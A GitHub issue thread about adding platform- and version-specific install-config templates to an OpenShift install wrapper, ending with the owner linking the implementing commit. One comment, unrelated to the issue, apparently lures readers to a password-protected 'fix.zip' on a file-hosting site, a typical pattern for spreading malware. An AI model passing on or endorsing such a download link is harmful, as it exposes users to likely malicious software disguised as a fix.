### ISSUE TITLE
Implement install-config versioning 

### ISSUE THREAD

**Issue by soukron** [soukron/openshift-install-wrapper#39]
install-config has been deprecating some fields during this time. Nowadays it shows deprecation warnings but eventually will fail.

Idea: create a directory with platform-version install configs in plain text and let the Makefile encode them as it does with the scripts

**Comment by paozhuanis1** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by soukron** [comment]
https://github.com/soukron/openshift-install-wrapper/commit/94f3f68d0cb6e0566371b8fed6c627c77b47c2d9 includes versioning/lookup of different install-config templates based on platform, z-stream version, minor version and defaults to platform install-config.yaml.
